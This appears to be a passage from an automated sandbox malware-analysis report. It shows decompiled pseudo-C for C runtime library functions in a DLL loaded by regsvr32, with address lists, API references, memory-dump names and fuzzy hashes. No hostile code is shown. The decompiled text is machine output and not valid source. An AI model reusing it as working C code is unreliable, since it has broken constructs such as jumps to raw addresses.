				if ( *_t121 != 0) goto 0x2b07692f;
				goto 0x2b076997;
				if (_t56 != 0x3b) goto 0x2b07693d;
				_t135 = _t121;
				_t57 =  *((intOrPtr*)(_t135 + 1));
				 *_t135 = _t57;
				if (_t57 != 0) goto 0x2b07694d;
				goto 0x2b076940;
				_t94 =  *0x2b0c8490; // 0x7ffd2b0c8480
				_t143 = _t100;
				 *_t129 = _t94;
				_t95 =  *0x2b0c8498; // 0x7ffd2b0c9b78
				_t129[2] = _t95;
				_t96 =  *0x2b0c84a0; // 0x7ffd2b0c9b78
				_t129[4] = _t96;
				_t97 =  *0x2b0c84e8; // 0x7ffd2b0c8484
				_t129[0x16] = _t97;
				_t98 =  *0x2b0c84f0; // 0x7ffd2b0c9b7c
				_t129[0x18] = _t98;
				 *_t146 = r12d;
				if (_t143 == 0) goto 0x2b0769a3;
				 *_t143 = r12d;
				if ( *(_t125 + 0x118) == 0) goto 0x2b0769b2;
				asm("lock dec dword [eax]");
				_t89 =  *(_t125 + 0x110);
				if (_t89 == 0) goto 0x2b0769db;
				asm("lock dec dword [ecx]");
				if (_t89 != 0) goto 0x2b0769db;
				free(_t122);
				free(??);
				 *(_t125 + 0x118) = _t143;
				 *(_t125 + 0x110) = _t146;
				 *(_t125 + 0x128) = _t129;
				return 0;
			}

0x7ffd2b0767a8
0x7ffd2b0767a8
0x7ffd2b0767a8
0x7ffd2b0767ab
0x7ffd2b0767af
0x7ffd2b0767b3
0x7ffd2b0767c0
0x7ffd2b0767c6
0x7ffd2b0767c9
0x7ffd2b0767cd
0x7ffd2b0767d4
0x7ffd2b0767d9
0x7ffd2b0767db
0x7ffd2b0767de
0x7ffd2b0767e8
0x7ffd2b0767f2
0x7ffd2b0767fd
0x7ffd2b076802
0x7ffd2b076808
0x7ffd2b07680d
0x7ffd2b07681c
0x7ffd2b07681f
0x7ffd2b07682b
0x7ffd2b076830
0x7ffd2b076836
0x7ffd2b07683b
0x7ffd2b076840
0x7ffd2b076842
0x7ffd2b076847
0x7ffd2b076850
0x7ffd2b076858
0x7ffd2b07685b
0x7ffd2b076861
0x7ffd2b076863
0x7ffd2b076867
0x7ffd2b07686c
0x7ffd2b076875
0x7ffd2b076878
0x7ffd2b07687d
0x7ffd2b076882
0x7ffd2b076886
0x7ffd2b07688b
0x7ffd2b076890
0x7ffd2b076896
0x7ffd2b07689e
0x7ffd2b0768a3
0x7ffd2b0768a3
0x7ffd2b0768a7
0x7ffd2b0768ac
0x7ffd2b0768b2
0x7ffd2b0768ba
0x7ffd2b0768bf
0x7ffd2b0768c4
0x7ffd2b0768cc
0x7ffd2b0768d0
0x7ffd2b0768d9
0x7ffd2b0768dc
0x7ffd2b0768e1
0x7ffd2b0768e6
0x7ffd2b0768ee
0x7ffd2b0768f2
0x7ffd2b0768fb
0x7ffd2b0768fe
0x7ffd2b076903
0x7ffd2b07690a
0x7ffd2b07690f
0x7ffd2b076914
0x7ffd2b07691b
0x7ffd2b076923
0x7ffd2b076928
0x7ffd2b07692d
0x7ffd2b07692f
0x7ffd2b076933
0x7ffd2b076937
0x7ffd2b076939
0x7ffd2b07693b
0x7ffd2b07693d
0x7ffd2b076942
0x7ffd2b076944
0x7ffd2b076948
0x7ffd2b07694a
0x7ffd2b07694d
0x7ffd2b076951
0x7ffd2b076959
0x7ffd2b07695b
0x7ffd2b07695d
0x7ffd2b076964
0x7ffd2b076967
0x7ffd2b07696b
0x7ffd2b076972
0x7ffd2b076976
0x7ffd2b07697d
0x7ffd2b076981
0x7ffd2b076988
0x7ffd2b07698c
0x7ffd2b076993
0x7ffd2b076997
0x7ffd2b07699d
0x7ffd2b07699f
0x7ffd2b0769ad
0x7ffd2b0769af
0x7ffd2b0769b9
0x7ffd2b0769bc
0x7ffd2b0769be
0x7ffd2b0769c1
0x7ffd2b0769ca
0x7ffd2b0769d6
0x7ffd2b0769db
0x7ffd2b0769e2
0x7ffd2b0769e9
0x7ffd2b076a0f

APIs

free.LIBCMT ref: 00007FFD2B07683B
__free_lconv_num.LIBCMT ref: 00007FFD2B07690F
free.LIBCMT ref: 00007FFD2B07691B
free.LIBCMT ref: 00007FFD2B0769CA
free.LIBCMT ref: 00007FFD2B0769D6

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$__free_lconv_num
String ID:
API String ID: 1547021563-0
Opcode ID: d3c8176391f41a5c27f56b3efe38b829e8bc72502893e69a1051d8bc9e91eaaa
Instruction ID: b5fa167fb3842eccb6888512b2c937b8b139f93016053b05ada66cad87f21066
Opcode Fuzzy Hash: d3c8176391f41a5c27f56b3efe38b829e8bc72502893e69a1051d8bc9e91eaaa
Instruction Fuzzy Hash: 7461A732B0A78289EB568F5599601B9B7A4FB86784F004135DF8E477A5DFBCE442F380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0748D4 Relevance: 7.7, APIs: 5, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00007FFD7FFD2B0748D4(signed int __ecx, signed long long __rax, long long __rbx, void* __rdx, signed int __r8) {
				signed short _t35;
				unsigned int _t38;
				unsigned int _t39;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				void* _t55;
				unsigned int _t56;
				void* _t59;
				signed int _t66;
				signed int _t67;
				void* _t70;
				signed int _t71;
				signed int _t72;
				void* _t73;
				signed int _t77;
				signed int _t80;
				signed long long _t83;
				void* _t88;
				void* _t97;
				void* _t99;
				void* _t100;
				signed long long _t105;
				void* _t108;
				void* _t111;
				void* _t113;

				_t86 = __rbx;
				_t83 = __rax;
				 *((long long*)(_t99 + 0x10)) = __rbx;
				_push(_t97);
				_t100 = _t99 - 0x30;
				asm("movaps [esp+0x20], xmm6");
				_t44 = __ecx & 0x0000001f;
				r14d = __ecx;
				_t2 = _t97 + 0x10; // 0x10
				r15d = _t2;
				if ((__ecx & 0x00000008) == 0) goto 0x2b07491b;
				if (r8b >= 0) goto 0x2b07491b;
				E00007FFD7FFD2B075038(_t44, __rax, __rbx, _t88);
				_t45 = _t44 & 0xfffffff7;
				goto 0x2b074b03;
				_t66 = 0x00000004 & r14b;
				if (_t66 == 0) goto 0x2b074939;
				asm("dec ecx");
				if (_t66 >= 0) goto 0x2b074939;
				E00007FFD7FFD2B075038(_t45, _t83, _t86, _t88);
				_t46 = _t45 & 0xfffffffb;
				goto 0x2b074b03;
				_t67 = dil & r14b;
				if (_t67 == 0) goto 0x2b0749fa;
				asm("dec ecx");
				if (_t67 >= 0) goto 0x2b0749fa;
				E00007FFD7FFD2B075038(_t46, _t83, _t86, _t88);
				_t105 = __r8 & _t83;
				if (_t67 == 0) goto 0x2b0749c6;
				if (_t105 == 0x2000) goto 0x2b0749ae;
				if (_t105 == 0x4000) goto 0x2b074996;
				_t70 = _t105 - _t83;
				if (_t70 != 0) goto 0x2b0749f2;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xfdee]");
				asm("movsd xmm0, [0x53bc6]");
				if (_t70 > 0) goto 0x2b0749ee;
				goto 0x2b0749e6;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xfdd6]");
				if (_t70 > 0) goto 0x2b0749d4;
				asm("movsd xmm0, [0x53bac]");
				goto 0x2b0749e6;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xfdbe]");
				if (_t70 <= 0) goto 0x2b0749de;
				asm("movsd xmm0, [0x53b94]");
				goto 0x2b0749ee;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xfda6]");
				if (_t70 <= 0) goto 0x2b0749de;
				asm("movsd xmm0, [0x53b6c]");
				goto 0x2b0749ee;
				asm("movsd xmm0, [0x53b62]");
				asm("xorpd xmm0, [0xfe62]");
				asm("movsd [esi], xmm0");
				_t47 = _t46 & 0xfffffffe;
				goto 0x2b074b03;
				_t71 = r14b & 0x00000002;
				if (_t71 == 0) goto 0x2b074b03;
				asm("dec ecx");
				if (_t71 >= 0) goto 0x2b074b03;
				asm("movsd xmm0, [edx]");
				asm("xorpd xmm6, xmm6");
				_t72 = r15b & r14b;
				r12d = 0;
				r12d =  !=  ? 1 : r12d;
				asm("ucomisd xmm0, xmm6");
				if (_t72 != 0) goto 0x2b074a31;
				if (_t72 != 0) goto 0x2b074a31;
				r12d = 1;
				goto 0x2b074af3;
				_t35 = E00007FFD7FFD2B079A18(0x6000, _t59, _t72, _t100 + 0x70, _t113, _t111, _t108);
				_t55 =  *((intOrPtr*)(_t100 + 0x70)) + 0xfffffa00;
				asm("movsd [esp+0x88], xmm0");
				_t73 = _t55 - 0xfffffbce;
				if (_t73 >= 0) goto 0x2b074a62;
				asm("mulsd xmm0, xmm6");
				r12d = 1;
				goto 0x2b074aef;
				asm("comisd xmm6, xmm0");
				if (_t73 > 0) goto 0x2b074a6c;
				 *(_t100 + 0x8e) = _t35 & 0x0000000f | r15w;
				if (_t55 - 0xfffffc03 >= 0) goto 0x2b074ada;
				_t38 =  *(_t100 + 0x88);
				r8d = 0xfffffc03;
				r8d = r8d - _t55;
				_t56 =  *(_t100 + 0x8c);
				if ((dil & _t38) == 0) goto 0x2b074ab3;
				r12d =  ==  ? 1 : r12d;
				_t39 = _t38 >> 1;
				 *(_t100 + 0x88) = _t39;
				_t77 = dil & _t56;
				if (_t77 == 0) goto 0x2b074acc;
				asm("bts eax, 0x1f");
				 *(_t100 + 0x88) = _t39;
				if (_t77 != 0) goto 0x2b074aa7;
				 *(_t100 + 0x8c) = _t56 >> 1;
				asm("movsd xmm0, [esp+0x88]");
				if (0 == 0) goto 0x2b074aef;
				asm("xorpd xmm0, [0xfd61]");
				asm("movsd [esi], xmm0");
				if (r12d == 0) goto 0x2b074b00;
				E00007FFD7FFD2B075038(_t47,  *(_t100 + 0x88) >> 0x30, _t86, _t113);
				_t48 = _t47 & 0xfffffffd;
				_t80 = r15b & r14b;
				if (_t80 == 0) goto 0x2b074b1c;
				asm("dec ecx");
				if (_t80 >= 0) goto 0x2b074b1c;
				E00007FFD7FFD2B075038(_t48,  *(_t100 + 0x88) >> 0x30, _t86, _t113);
				asm("movaps xmm6, [esp+0x20]");
				bpl = (_t48 & 0xffffffef) == 0;
				return 0;
			}

0x7ffd2b0748d4
0x7ffd2b0748d4
0x7ffd2b0748d4
0x7ffd2b0748d9
0x7ffd2b0748e4
0x7ffd2b0748ec
0x7ffd2b0748f1
0x7ffd2b0748fa
0x7ffd2b0748fd
0x7ffd2b0748fd
0x7ffd2b074904
0x7ffd2b074909
0x7ffd2b07490e
0x7ffd2b074913
0x7ffd2b074916
0x7ffd2b074920
0x7ffd2b074923
0x7ffd2b074925
0x7ffd2b07492a
0x7ffd2b07492c
0x7ffd2b074931
0x7ffd2b074934
0x7ffd2b07493e
0x7ffd2b074941
0x7ffd2b074947
0x7ffd2b07494c
0x7ffd2b074955
0x7ffd2b074962
0x7ffd2b074965
0x7ffd2b07496e
0x7ffd2b074977
0x7ffd2b074979
0x7ffd2b07497c
0x7ffd2b07497e
0x7ffd2b074982
0x7ffd2b07498a
0x7ffd2b074992
0x7ffd2b074994
0x7ffd2b074996
0x7ffd2b07499a
0x7ffd2b0749a2
0x7ffd2b0749a4
0x7ffd2b0749ac
0x7ffd2b0749ae
0x7ffd2b0749b2
0x7ffd2b0749ba
0x7ffd2b0749bc
0x7ffd2b0749c4
0x7ffd2b0749c6
0x7ffd2b0749ca
0x7ffd2b0749d2
0x7ffd2b0749d4
0x7ffd2b0749dc
0x7ffd2b0749de
0x7ffd2b0749e6
0x7ffd2b0749ee
0x7ffd2b0749f2
0x7ffd2b0749f5
0x7ffd2b0749fa
0x7ffd2b0749fe
0x7ffd2b074a04
0x7ffd2b074a09
0x7ffd2b074a0f
0x7ffd2b074a13
0x7ffd2b074a17
0x7ffd2b074a1a
0x7ffd2b074a1d
0x7ffd2b074a21
0x7ffd2b074a25
0x7ffd2b074a27
0x7ffd2b074a29
0x7ffd2b074a2c
0x7ffd2b074a36
0x7ffd2b074a3f
0x7ffd2b074a45
0x7ffd2b074a4e
0x7ffd2b074a54
0x7ffd2b074a56
0x7ffd2b074a5a
0x7ffd2b074a5d
0x7ffd2b074a62
0x7ffd2b074a68
0x7ffd2b074a80
0x7ffd2b074a8e
0x7ffd2b074a90
0x7ffd2b074a97
0x7ffd2b074a9d
0x7ffd2b074aa0
0x7ffd2b074aaa
0x7ffd2b074aaf
0x7ffd2b074ab3
0x7ffd2b074ab5
0x7ffd2b074abc
0x7ffd2b074abf
0x7ffd2b074ac1
0x7ffd2b074ac5
0x7ffd2b074ad1
0x7ffd2b074ad3
0x7ffd2b074ada
0x7ffd2b074ae5
0x7ffd2b074ae7
0x7ffd2b074aef
0x7ffd2b074af6
0x7ffd2b074afb
0x7ffd2b074b00
0x7ffd2b074b03
0x7ffd2b074b06
0x7ffd2b074b08
0x7ffd2b074b0d
0x7ffd2b074b14
0x7ffd2b074b1c
0x7ffd2b074b28
0x7ffd2b074b3d

APIs

_set_statfp.LIBCMT ref: 00007FFD2B07490E
_set_statfp.LIBCMT ref: 00007FFD2B07492C
_set_statfp.LIBCMT ref: 00007FFD2B074955
_set_statfp.LIBCMT ref: 00007FFD2B074B14

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 32046ce077eb0d4c09ab2571985d77e1313bccb37bdafd444ae120eeda8f2021
Instruction ID: ed08212a371049859d12a698dfdf71b3c080964eb3e180162bf4d734f4ab23cf
Opcode Fuzzy Hash: 32046ce077eb0d4c09ab2571985d77e1313bccb37bdafd444ae120eeda8f2021
Instruction Fuzzy Hash: CA519512F0A95645F6238F35AE6037EE250EF43350F188235DA5E165F4EFBCA885F684

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B072284 Relevance: 7.6, APIs: 5, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00007FFD7FFD2B072284(void* __ecx, void* __edx, signed int* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, signed int* _a24, long long _a32) {
				signed int* _v40;
				void* _t30;
				void* _t39;
				intOrPtr _t44;
				void* _t48;
				signed int* _t62;
				signed int* _t67;
				signed int _t80;
				signed int* _t85;
				intOrPtr _t97;
				void* _t98;

				_t79 = __rdx;
				_t62 = __rax;
				_t48 = __edx;
				_t40 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a32 = __rdi;
				_t98 = __rdx;
				r12d = __ecx;
				_t52 = __ecx - 5;
				if (__ecx - 5 <= 0) goto 0x2b0722c1;
				E00007FFD7FFD2B067698(__rax);
				 *__rax = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b072426;
				E00007FFD7FFD2B067F5C(_t40, _t52, __rax, __rcx, __rsi, __r8);
				_t67 = _t62;
				_a24 = _t62;
				E00007FFD7FFD2B071298(_t40, _t48, _t52, _t62, __rcx, __rdi, __rsi);
				_t67[0x32] = _t67[0x32] | 0x00000010;
				E00007FFD7FFD2B06796C(_t67, __rcx, _t79, __rdi, __rsi, __rbp);
				_t85 = _t62;
				if (_t62 == 0) goto 0x2b07241c;
				E00007FFD7FFD2B0696D8();
				_t80 = _t67[0x30];
				if (_t80 == 0) goto 0x2b07232b;
				if (_t85 == _t80) goto 0x2b07232b;
				r8d = 0x160;
				_t30 = E00007FFD7FFD2B064B80(0xc, _t85 - _t80, _t85, _t80, __r8);
				 *_t85 =  *_t85 & 0x00000000;
				E00007FFD7FFD2B070F94(_t30, _t85, __r8);
				E00007FFD7FFD2B0695B8();
				E00007FFD7FFD2B071F20(0xc, r12d, _t85, _t98);
				_v40 = _t62;
				if (_t62 == 0) goto 0x2b07240b;
				if (_t98 == 0) goto 0x2b072382;
				E00007FFD7FFD2B0657E0(0xc, _t98, 0x2b0c7df4);
				_t44 =  *0x2b0c9b08; // 0x0
				r12d = 1;
				_t45 =  !=  ? r12d : _t44;
				 *0x2b0c9b08 =  !=  ? r12d : _t44;
				goto 0x2b072388;
				r12d = 1;
				E00007FFD7FFD2B0696D8();
				_t9 =  &(_t67[0x30]); // 0xc0
				E00007FFD7FFD2B071020(E00007FFD7FFD2B071240(_t62, _t9, _t85, _t85, _t62, _t98), _t85, _t98);
				if ((_t67[0x32] & 0x00000002) != 0) goto 0x2b0723ff;
				if (( *0x2b0c7df0 & r12b) != 0) goto 0x2b0723ff;
				E00007FFD7FFD2B071240(_t62, 0x2b0c8220, _t67[0x30], _t85, _t62, _t98);
				_t97 =  *0x2b0c8220; // 0x7ffd2b0c80c0
				_t16 = _t97 + 0x128; // 0x7ffd2b0c8490
				 *0x2b0c8488 =  *_t16;
				_t17 = _t97 + 0x140; // 0x7ffd2b084960
				 *0x2b0c8468 =  *_t17;
				_t18 = _t97 + 0x10c; // 0x1
				 *0x2b0c8528 =  *_t18;
				E00007FFD7FFD2B0695B8();
				goto 0x2b07241c;
				E00007FFD7FFD2B071020( *_t18, _t85, _t98);
				_t39 = E00007FFD7FFD2B0710C4(_t67, _t85, _t67[0x30], _t85, _t62);
				_t67[0x32] = _t67[0x32] & 0xffffffef;
				return _t39;
			}

0x7ffd2b072284
0x7ffd2b072284
0x7ffd2b072284
0x7ffd2b072284
0x7ffd2b072284
0x7ffd2b072289
0x7ffd2b07228e
0x7ffd2b07229d
0x7ffd2b0722a0
0x7ffd2b0722a5
0x7ffd2b0722a8
0x7ffd2b0722aa
0x7ffd2b0722af
0x7ffd2b0722b5
0x7ffd2b0722bc
0x7ffd2b0722c1
0x7ffd2b0722c6
0x7ffd2b0722c9
0x7ffd2b0722ce
0x7ffd2b0722d3
0x7ffd2b0722e4
0x7ffd2b0722e9
0x7ffd2b0722ef
0x7ffd2b0722fa
0x7ffd2b072300
0x7ffd2b07230a
0x7ffd2b07230f
0x7ffd2b072314
0x7ffd2b07231a
0x7ffd2b07231f
0x7ffd2b072325
0x7ffd2b072330
0x7ffd2b07233e
0x7ffd2b072346
0x7ffd2b07234e
0x7ffd2b072357
0x7ffd2b072363
0x7ffd2b072368
0x7ffd2b072370
0x7ffd2b072376
0x7ffd2b07237a
0x7ffd2b072380
0x7ffd2b072382
0x7ffd2b07238d
0x7ffd2b072396
0x7ffd2b0723a5
0x7ffd2b0723b1
0x7ffd2b0723ba
0x7ffd2b0723ca
0x7ffd2b0723cf
0x7ffd2b0723d6
0x7ffd2b0723dd
0x7ffd2b0723e4
0x7ffd2b0723eb
0x7ffd2b0723f2
0x7ffd2b0723f9
0x7ffd2b072404
0x7ffd2b072409
0x7ffd2b07240e
0x7ffd2b072416
0x7ffd2b07241c
0x7ffd2b07243f

APIs

_errno.LIBCMT ref: 00007FFD2B0722AA
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B0722B5
_getptd.LIBCMT ref: 00007FFD2B0722C1
_lock.LIBCMT ref: 00007FFD2B0722FA
_lock.LIBCMT ref: 00007FFD2B07238D

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _lock$_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 2808128820-0
Opcode ID: 5f3b5c5d687af83f64d7d5234137c8fd33df6528416cfad91178659c89b0326c
Instruction ID: c0b4a6010aa19b3ca1e3f01a4ed433a9c6c7168db2e8423a2eea6cbf89859efb
Opcode Fuzzy Hash: 5f3b5c5d687af83f64d7d5234137c8fd33df6528416cfad91178659c89b0326c
Instruction Fuzzy Hash: 26415B31B0B64286F706AB119E617BAA291FF4B790F140134EE4D077E6DEBCA841A394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B068F40 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 00007FFD2B068F81
_exception_enabled.LIBCMT ref: 00007FFD2B068FA3

Part of subcall function 00007FFD2B068E84: _set_statfp.LIBCMT ref: 00007FFD2B068EAB
Part of subcall function 00007FFD2B068E84: _set_statfp.LIBCMT ref: 00007FFD2B068F1E

_raise_excf.LIBCMT ref: 00007FFD2B068FEF
_ctrlfp.LIBCMT ref: 00007FFD2B06903B
_ctrlfp.LIBCMT ref: 00007FFD2B06906C

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _ctrlfp$_set_statfp$_exception_enabled_raise_excf
String ID:
API String ID: 3843346586-0
Opcode ID: 1b50414a80639452b7d273b3766bd6da263888b3791c87089997bba76336f12f
Instruction ID: bb30adc410097ac689a5dbacb716e8a0f4624d3669ef788fcb70a32929fc0f01
Opcode Fuzzy Hash: 1b50414a80639452b7d273b3766bd6da263888b3791c87089997bba76336f12f
Instruction Fuzzy Hash: 1D41A732E19A858DE7118B25E9512AEB361FB8A388F040235FA4956A68DF7CE441DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B072144 Relevance: 7.6, APIs: 5, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00007FFD7FFD2B072144(void* __ecx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr* _t21;
				intOrPtr* _t34;

				_t21 = _t34;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = __rbp;
				 *((long long*)(_t21 + 0x18)) = __rsi;
				 *((long long*)(_t21 + 0x20)) = __rdi;
				if (__ecx - 5 > 0) goto 0x2b072192;
				if (__rdx == 0) goto 0x2b072192;
				r12d = 1;
				E00007FFD7FFD2B06796C(__rbx, __rcx, __rdx, __rdi, __rdx, __rbp);
				if (_t21 != 0) goto 0x2b0721af;
				E00007FFD7FFD2B067698(_t21);
				 *_t21 = 0xc;
				return 0;
			}

0x7ffd2b072144
0x7ffd2b072147
0x7ffd2b07214b
0x7ffd2b07214f
0x7ffd2b072153
0x7ffd2b072165
0x7ffd2b07216a
0x7ffd2b07216c
0x7ffd2b07217a
0x7ffd2b072185
0x7ffd2b072187
0x7ffd2b07218c
0x7ffd2b0721ae

APIs

_errno.LIBCMT ref: 00007FFD2B072187
free.LIBCMT ref: 00007FFD2B0721C7
free.LIBCMT ref: 00007FFD2B0721E7
free.LIBCMT ref: 00007FFD2B072244
free.LIBCMT ref: 00007FFD2B07225C

Part of subcall function 00007FFD2B06796C: Sleep.KERNEL32(?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B0679B1

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$Sleep_errno
String ID:
API String ID: 2081351063-0
Opcode ID: a52b42de46a5615ca2b388d49ae21bda1e98984a3fa8a53537a30db7aca59961
Instruction ID: f55d16dbfbcd26855133ecc2847092a9ec095697f76c3abf75ac43590078a2b8
Opcode Fuzzy Hash: a52b42de46a5615ca2b388d49ae21bda1e98984a3fa8a53537a30db7aca59961
Instruction Fuzzy Hash: 28314421B0A64285EB169F51CE71279A291FF56FC4F048031DF4D073B6DEBCE841A390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06909C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 21%

			E00007FFD7FFD2B06909C(signed int __edx, void* __eflags, long long __rcx, long long __r8) {
				void* __rbx;
				void* __rsi;
				void* _t24;
				void* _t34;
				void* _t35;
				signed int _t42;
				signed long long _t52;
				signed long long _t53;
				void* _t64;
				void* _t69;
				void* _t70;
				void* _t71;
				signed long long _t72;
				void* _t76;

				_t70 = _t71 - 0x38;
				_t72 = _t71 - 0x108;
				asm("movaps [eax-0x48], xmm6");
				_t52 =  *0x2b0c70a0; // 0xf787487f4682
				_t53 = _t52 ^ _t72;
				 *(_t70 - 0x20) = _t53;
				r13d = 0xffc0;
				_t42 = r9d;
				E00007FFD7FFD2B074FBC(_t35, _t42, __r8, __rcx, _t64, _t69);
				 *(_t72 + 0x30) = _t53;
				 *((long long*)(_t72 + 0x40)) = __r8;
				asm("movsd xmm0, [esp+0x40]");
				asm("movsd [esp+0x38], xmm0");
				_t24 = E00007FFD7FFD2B068E84( *((intOrPtr*)(_t70 + 0x60)), r13d, __r8,  *(_t72 + 0x30), _t69);
				asm("movsd xmm6, [ebp+0x78]");
				if (_t24 != 0) goto 0x2b069151;
				if ( *((intOrPtr*)(_t70 + 0x80)) != 2) goto 0x2b069128;
				asm("movsd [ebp-0x60], xmm6");
				 *(_t70 - 0x50) =  *(_t70 - 0x50) & 0xffffffe3 | 0x00000003;
				r8d =  *((intOrPtr*)(_t70 + 0x60));
				 *((long long*)(_t72 + 0x28)) = _t72 + 0x38;
				_t14 = _t70 + 0x70; // 0x10030
				r9d = __edx;
				 *((long long*)(_t72 + 0x20)) = _t14;
				E00007FFD7FFD2B074880();
				if ( *0x2b0c8460 != 0) goto 0x2b0691ae;
